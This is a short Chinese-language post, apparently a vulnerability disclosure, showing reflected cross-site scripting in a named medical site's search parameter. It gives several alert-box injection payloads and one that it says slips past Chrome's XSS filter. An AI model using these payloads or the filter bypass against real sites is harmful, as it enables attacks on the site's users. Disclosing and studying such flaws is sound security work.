形式:http://so.haodf.com/all.php?fromcode=utf-8&type=all&q=exp*或者http://search.haodf.com/all.php? ... ;type=all&q=exp*复制内容到剪贴板代码:exp1:[</title><script>alert(/nandi/)</script><title>]
exp2:[" /><script>alert(/nandi/)</script><xss a="]
exp3:[a"><script>alert(/nandi/)</script><""]
exp4:[</center><script>alert(/nandi/)<center>]
以上测试来自IE,当换到chrome下时,console里会提示Refused to execute a JavaScript script. Source code of script found within request.无比强大的过滤功能,看前后源代码,发现源网页中本来就有script的标签属性,于是构造code:复制内容到剪贴板代码:[<script src=data:,alert(/nandi/)<!--]
给它插入,成功在chrome下绕过过滤,弹出xss。